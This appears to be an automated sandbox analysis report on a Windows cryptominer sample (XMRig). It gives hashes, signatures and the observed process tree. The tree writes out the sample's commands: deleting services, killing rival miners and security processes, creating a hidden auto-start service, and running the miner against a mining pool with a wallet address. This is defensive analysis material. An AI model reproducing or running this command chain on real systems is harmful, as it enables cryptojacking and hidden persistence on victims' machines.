Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-05-2024 10:26

General

  • Target

    5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe

  • Size

    1.3MB

  • MD5

    5e960ba61a82c5340650e2ce975bb4c9

  • SHA1

    300aced1503b54d91e5508f0a210330e91b71b8a

  • SHA256

    1faff4cf4bfe0d40af1555dc2ca749c5a382197b51b327ad89c4734d6ba75ee3

  • SHA512

    9143b2172a13f1d36380bd7dc9875d21c994b9aaed71b3d3a094de23ff58b3ec64adb166b727b1a41574447cd67e30ec8992278fa78d0f3f42928e576e5d1fa1

  • SSDEEP

    24576:jJlh9bDrRloua2E61y6ssIpCLpNwDfzhC8avIZej5O:jJp/FLrWpe8xChgZej5O

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 14 IoCs
  • Creates new service(s) 2 TTPs
  • Sets file to hidden 1 TTPs 4 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • VMProtect packed file 4 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Drops file in Windows directory 16 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 15 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:1376
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\WINDOWS\Debug\wkde\wk.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4320
      • C:\Windows\SysWOW64\sc.exe
        sc delete Systemss
        3⤵
        • Launches sc.exe
        PID:940
      • C:\Windows\SysWOW64\sc.exe
        sc delete WMIserver
        3⤵
        • Launches sc.exe
        PID:1352
      • C:\Windows\SysWOW64\sc.exe
        sc delete WMIservers
        3⤵
        • Launches sc.exe
        PID:1280
      • C:\Windows\SysWOW64\sc.exe
        sc delete WMI
        3⤵
        • Launches sc.exe
        PID:2540
      • C:\Windows\SysWOW64\sc.exe
        sc delete Serv
        3⤵
        • Launches sc.exe
        PID:3560
      • C:\Windows\SysWOW64\sc.exe
        sc delete system_update
        3⤵
        • Launches sc.exe
        PID:3224
      • C:\Windows\SysWOW64\sc.exe
        sc delete system_updatea
        3⤵
        • Launches sc.exe
        PID:3944
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im spoolsvs.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4896
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im taskhost.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4552
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im NsCpuapl.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4792
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im MSASCui.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2268
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im nheqminer_zcash.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3844
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im nssm.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4588
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im update.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:544
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im server.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4284
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im sppscv.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:628
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im taskhost.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4376
      • C:\Windows\SysWOW64\net.exe
        net stop wkde
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4508
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop wkde
          4⤵
            PID:4144
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 5 127.0.0.1
          3⤵
          • Runs ping.exe
          PID:1236
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /im mscorsvw.exe /f
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3220
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /im WUDFHost.exe /f
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1924
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /im nheqminer.exe /f
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4744
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /im NsCpuCNMiner32.exe /f
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2224
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /im NsCpuCNMiner64.exe /f
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4748
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 5 127.0.0.1
          3⤵
          • Runs ping.exe
          PID:3100
        • C:\Windows\SysWOW64\sc.exe
          sc create wkde binPath= C:\WINDOWS\Debug\wkde\mscorsvw.exe start= auto
          3⤵
          • Launches sc.exe
          PID:1040
        • C:\Windows\SysWOW64\net.exe
          net start wkde
          3⤵
            PID:1376
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 start wkde
              4⤵
                PID:4540
            • C:\Windows\SysWOW64\attrib.exe
              attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.exe
              3⤵
              • Sets file to hidden
              • Drops file in Windows directory
              • Views/modifies file attributes
              PID:3944
            • C:\Windows\SysWOW64\attrib.exe
              attrib +s +h C:\WINDOWS\Debug\wkde\svchost.exe
              3⤵
              • Sets file to hidden
              • Drops file in Windows directory
              • Views/modifies file attributes
              PID:1284
            • C:\Windows\SysWOW64\attrib.exe
              attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.ini
              3⤵
              • Sets file to hidden
              • Drops file in Windows directory
              • Views/modifies file attributes
              PID:4164
            • C:\Windows\SysWOW64\attrib.exe
              attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.log
              3⤵
              • Sets file to hidden
              • Drops file in Windows directory
              • Views/modifies file attributes
              PID:3616
        • C:\WINDOWS\Debug\wkde\mscorsvw.exe
          C:\WINDOWS\Debug\wkde\mscorsvw.exe
          1⤵
          • Executes dropped EXE
          • Drops file in Windows directory
          PID:1648
          • C:\WINDOWS\Debug\wkde\svchost.exe
            C:\WINDOWS\Debug\wkde\svchost.exe -o pool.minexmr.com:5555 -u 42NQYEALh7aC85Q376QpbJauGPfLLHUr3ZQCctLDEWQE3gWQUqfuDGg3vavPEB5edtGbtCHFTs6UJfZtHd2fVGAzHLwXmuN -p x -k --donate-level=1%
            2⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:4040

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\WINDOWS\Debug\wkde\mscorsvw.ini

          Filesize

          397B

          MD5

          d298cd48c88433017ef4e66af740830e

          SHA1

          e0ef455dc4df16948d85c5a058d0980ce5020822

          SHA256

          b22ef4711432e08a93b9ef241616e51f17744a762e47b1d871aeabb6d4ae5d89

          SHA512

          5927b46c620a5b91b072ac48d7c5f2a98eff1984c8b82ae636512ebcfbb1a9d3b122f4cae81c802da4a81b0c5ee3143a931eaf42844226b7ea6aeaeceb12b8fe

        • C:\WINDOWS\Debug\wkde\mscorsvw.log

          Filesize

          244B

          MD5

          0a98d172405546d83c748505a590f268

          SHA1

          0a107d99277cc976260d59d60ea2e513a5280688

          SHA256

          cb4075e76b795f5a464a50114628b2d62e3546aa9735a0ebffef29b3e94bdcac

          SHA512

          89c091858c44cd0055a33de6fd89b20f0735bdb071f03158b76ae312af8901827f3fd26c3c7f12cfe777e42f1d4f7874da30770b3ebcb4fadd79543d100af0ef

        • C:\WINDOWS\Debug\wkde\wk.bat

          Filesize

          884B

          MD5

          816d97b2dca2af96209ef913291d59be

          SHA1

          a3c480a7e333a1623e7cd8194d68468397c3f6d1

          SHA256

          ccf0010fcc0783096c0323c3bbe6a88a4d969c8b327626d1eb5b493e03a8e54d

          SHA512

          54bbff4724a8b2065273f118aa1eeb61542df82fc853e01155470053b8f18cd9e1c0f8618c077dab13767e187f93653842a8df852496e5bdf7e2dd7fc0120088

        • C:\Windows\debug\wkde\mscorsvw.exe

          Filesize

          684KB

          MD5

          cbb4ca806e69a4880dd02e04e5bce18b

          SHA1

          1e838ddad7b04a1f2be935f6fe8e7cff3466c4d7

          SHA256

          2cadd79540acdfcc6d99875a79ed7c35fd3508e5ba6c29c9caae598fcc40b79b

          SHA512

          6240fcdf8899c8d62357ad4cfe4c749517fa91c81d8765f2e1b3e23fdf95cdde09f8954da5b5f0ef1e0fa7e34d88e5dd7070134eefc40f98a6b6264f18a295a6

        • C:\Windows\debug\wkde\svchost.exe

          Filesize

          687KB

          MD5

          79a1ec8d32e8e3032b5f5126c11f2216

          SHA1

          86dc55fcdc358a5c6699c41582b66b75bedc4086

          SHA256

          d3bc4df4062d1a93dfe8e5beae484f011285b6c5b1f92bfa765deb59981ae2c8

          SHA512

          a80fa204f05a5be209a945af9c5f8e6773c338a3cb5bd526c29e78932ed04d2c625dcb3fe5e918b07b316ba6981bb517714ad524a37f73f6055600ae1c145106

        • memory/1648-26-0x0000000000400000-0x000000000055E000-memory.dmp

          Filesize

          1.4MB

        • memory/1648-13-0x0000000000400000-0x000000000055E000-memory.dmp

          Filesize

          1.4MB

        • memory/1648-14-0x0000000000400000-0x000000000055E000-memory.dmp

          Filesize

          1.4MB

        • memory/4040-27-0x0000000000400000-0x00000000004B5000-memory.dmp

          Filesize

          724KB

        • memory/4040-25-0x0000000000400000-0x00000000004B5000-memory.dmp

          Filesize

          724KB

        • memory/4040-24-0x0000000000400000-0x00000000004B5000-memory.dmp

          Filesize

          724KB

        • memory/4040-28-0x0000000000400000-0x00000000004B5000-memory.dmp

          Filesize

          724KB

        • memory/4040-29-0x0000000000400000-0x00000000004B5000-memory.dmp

          Filesize

          724KB

        • memory/4040-30-0x0000000000400000-0x00000000004B5000-memory.dmp

          Filesize

          724KB

        • memory/4040-31-0x0000000000400000-0x00000000004B5000-memory.dmp

          Filesize

          724KB

        • memory/4040-32-0x0000000000400000-0x00000000004B5000-memory.dmp

          Filesize

          724KB

        • memory/4040-33-0x0000000000400000-0x00000000004B5000-memory.dmp

          Filesize

          724KB

        • memory/4040-34-0x0000000000400000-0x00000000004B5000-memory.dmp

          Filesize

          724KB

        • memory/4040-35-0x0000000000400000-0x00000000004B5000-memory.dmp

          Filesize

          724KB

        • memory/4040-36-0x0000000000400000-0x00000000004B5000-memory.dmp

          Filesize

          724KB

        • memory/4040-37-0x0000000000400000-0x00000000004B5000-memory.dmp

          Filesize

          724KB